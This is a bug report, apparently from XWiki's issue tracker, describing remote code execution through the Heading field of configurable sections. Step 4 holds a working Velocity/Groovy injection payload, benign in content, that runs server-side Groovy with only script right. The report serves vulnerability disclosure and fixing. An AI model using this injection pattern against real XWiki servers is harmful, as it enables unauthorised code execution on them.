RCE from script right in configurable sections

Steps to reproduce:

1. Login as a user with script right.
2. Edit your user profile (or any other editable page) and add an object of type "XWiki.ConfigurableClass" ("Custom configurable sections").
3. Set "Display in section" to "other".
4. Set "Heading" to 

    #set($codeToExecute = 'Test') #set($codeToExecuteResult = '{{async}}{{groovy}}services.logging.getLogger("attacker").error("Attack from Heading succeeded!"); println("Hello from Groovy!"){{/groovy}}{{/async}}') My Heading $app.getRenderedContent('{{groovy}}println("Hello from rendered content!"){{/groovy}}', 'xwiki/2.1')

5. Set "Display in Category" to "other"
6. Set "Scope" to "Wiki and all spaces"
7. Click "Save"
8. Open <xwiki-host>/xwiki/bin/view/Main/?sheet=XWiki.AdminSheet&viewer=content&editor=globaladmin&section=other where <xwiki-host> is the URL of your XWiki installation.

Expected result:

No error log is displayed, some error is displayed for the heading that Groovy execution isn't allowed.

Actual result:

"My Heading <p>Hello from rendered content!</p>" is displayed as heading, the content below says "Hello from Groovy!" and a lock message "Attack from Heading succeeded!" is displayed. This shows that the Groovy code has been executed. Note that this is with all fixes from XWIKI-21121 applied, before that no script right was necessary.

This issue exploits XWIKI-21192 and might be fixed when XWIKI-21192 has been fixed but this could also be fixed independently by executing the heading's Velocity code more securely.